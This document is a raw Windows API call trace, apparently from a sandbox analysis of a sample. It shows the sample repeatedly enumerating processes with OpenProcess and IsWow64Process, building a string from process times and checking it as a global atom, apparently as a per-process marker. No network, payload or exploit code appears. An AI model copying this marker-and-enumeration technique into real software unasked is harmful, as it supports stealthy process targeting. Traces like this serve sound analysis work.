	[0092.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0092.367] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.367] CloseHandle (hObject=0x20c) returned 1
	[0092.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0092.367] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.367] CloseHandle (hObject=0x20c) returned 1
	[0092.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0092.367] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.367] CloseHandle (hObject=0x20c) returned 1
	[0092.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0092.367] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.367] CloseHandle (hObject=0x20c) returned 1
	[0092.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0092.367] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.368] CloseHandle (hObject=0x20c) returned 1
	[0092.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0092.368] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.368] CloseHandle (hObject=0x20c) returned 1
	[0092.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0092.368] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.368] CloseHandle (hObject=0x20c) returned 1
	[0092.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0092.368] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.368] CloseHandle (hObject=0x20c) returned 1
	[0092.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0092.368] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.368] CloseHandle (hObject=0x20c) returned 1
	[0092.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0092.368] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.368] CloseHandle (hObject=0x20c) returned 1
	[0092.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0092.369] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.369] CloseHandle (hObject=0x20c) returned 1
	[0092.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0092.369] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.369] CloseHandle (hObject=0x20c) returned 1
	[0092.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0092.369] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.369] CloseHandle (hObject=0x20c) returned 1
	[0092.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0092.369] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.369] CloseHandle (hObject=0x20c) returned 1
	[0092.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0092.369] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.369] CloseHandle (hObject=0x20c) returned 1
	[0092.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.369] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.370] CloseHandle (hObject=0x20c) returned 1
	[0092.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.370] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.370] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0092.370] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0092.370] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0092.370] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.371] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0092.371] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.371] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0092.371] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0092.371] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0092.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0092.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0092.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0092.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0092.371] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.371] CloseHandle (hObject=0x20c) returned 1
	[0092.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0092.372] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.372] CloseHandle (hObject=0x20c) returned 1
	[0092.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0092.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0092.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0092.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0092.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0092.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0092.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0092.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0092.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0092.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0092.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0092.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0092.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0092.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0092.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0092.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0092.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0092.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0092.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0092.444] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.444] CloseHandle (hObject=0x20c) returned 1
	[0092.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0092.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0092.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0092.444] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.444] CloseHandle (hObject=0x20c) returned 1
	[0092.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0092.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0092.444] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.444] CloseHandle (hObject=0x20c) returned 1
	[0092.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0092.444] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.444] CloseHandle (hObject=0x20c) returned 1
	[0092.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0092.445] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.445] CloseHandle (hObject=0x20c) returned 1
	[0092.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0092.445] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.445] CloseHandle (hObject=0x20c) returned 1
	[0092.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0092.445] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.445] CloseHandle (hObject=0x20c) returned 1
	[0092.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0092.445] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.445] CloseHandle (hObject=0x20c) returned 1
	[0092.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0092.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0092.445] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.445] CloseHandle (hObject=0x20c) returned 1
	[0092.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0092.446] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.446] CloseHandle (hObject=0x20c) returned 1
	[0092.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0092.446] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.446] CloseHandle (hObject=0x20c) returned 1
	[0092.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0092.446] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.446] CloseHandle (hObject=0x20c) returned 1
	[0092.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0092.446] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.446] CloseHandle (hObject=0x20c) returned 1
	[0092.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0092.446] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.446] CloseHandle (hObject=0x20c) returned 1
	[0092.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0092.446] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.446] CloseHandle (hObject=0x20c) returned 1
	[0092.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0092.447] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.447] CloseHandle (hObject=0x20c) returned 1
	[0092.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0092.447] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.447] CloseHandle (hObject=0x20c) returned 1
	[0092.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0092.447] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.447] CloseHandle (hObject=0x20c) returned 1
	[0092.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0092.447] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.447] CloseHandle (hObject=0x20c) returned 1
	[0092.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0092.447] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.447] CloseHandle (hObject=0x20c) returned 1
	[0092.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0092.447] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.448] CloseHandle (hObject=0x20c) returned 1
	[0092.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0092.448] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.448] CloseHandle (hObject=0x20c) returned 1
	[0092.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0092.448] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.448] CloseHandle (hObject=0x20c) returned 1
	[0092.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0092.448] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.448] CloseHandle (hObject=0x20c) returned 1
	[0092.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0092.448] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.448] CloseHandle (hObject=0x20c) returned 1
	[0092.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0092.448] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.448] CloseHandle (hObject=0x20c) returned 1
	[0092.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0092.449] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.449] CloseHandle (hObject=0x20c) returned 1
	[0092.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0092.449] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.449] CloseHandle (hObject=0x20c) returned 1
	[0092.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0092.449] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.449] CloseHandle (hObject=0x20c) returned 1
	[0092.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0092.449] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.449] CloseHandle (hObject=0x20c) returned 1
	[0092.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.449] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.449] CloseHandle (hObject=0x20c) returned 1
	[0092.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.450] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.450] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0092.450] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0092.450] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0092.450] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.450] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0092.451] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.451] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0092.451] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0092.451] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0092.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0092.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0092.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0092.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0092.451] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.451] CloseHandle (hObject=0x20c) returned 1
	[0092.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0092.452] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.452] CloseHandle (hObject=0x20c) returned 1
	[0092.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0092.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0092.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0092.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0092.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0092.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0092.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0092.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0092.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0092.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0092.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0092.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0092.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0092.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0092.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0092.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0092.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0092.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0092.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0092.524] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.524] CloseHandle (hObject=0x20c) returned 1
	[0092.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0092.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0092.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0092.524] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.524] CloseHandle (hObject=0x20c) returned 1
	[0092.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0092.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0092.525] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.525] CloseHandle (hObject=0x20c) returned 1
	[0092.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0092.525] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.525] CloseHandle (hObject=0x20c) returned 1
	[0092.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0092.525] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.525] CloseHandle (hObject=0x20c) returned 1
	[0092.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0092.525] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.525] CloseHandle (hObject=0x20c) returned 1
	[0092.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0092.525] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.525] CloseHandle (hObject=0x20c) returned 1
	[0092.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0092.526] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.526] CloseHandle (hObject=0x20c) returned 1
	[0092.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0092.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0092.526] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.526] CloseHandle (hObject=0x20c) returned 1
	[0092.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0092.526] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.526] CloseHandle (hObject=0x20c) returned 1
	[0092.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0092.526] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.526] CloseHandle (hObject=0x20c) returned 1
	[0092.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0092.527] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.527] CloseHandle (hObject=0x20c) returned 1
	[0092.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0092.527] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.527] CloseHandle (hObject=0x20c) returned 1
	[0092.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0092.527] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.527] CloseHandle (hObject=0x20c) returned 1
	[0092.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0092.527] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.527] CloseHandle (hObject=0x20c) returned 1
	[0092.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0092.527] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.527] CloseHandle (hObject=0x20c) returned 1
	[0092.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0092.528] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.528] CloseHandle (hObject=0x20c) returned 1
	[0092.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0092.528] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.528] CloseHandle (hObject=0x20c) returned 1
	[0092.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0092.528] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.528] CloseHandle (hObject=0x20c) returned 1
	[0092.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0092.528] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.528] CloseHandle (hObject=0x20c) returned 1
	[0092.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0092.528] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.528] CloseHandle (hObject=0x20c) returned 1
	[0092.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
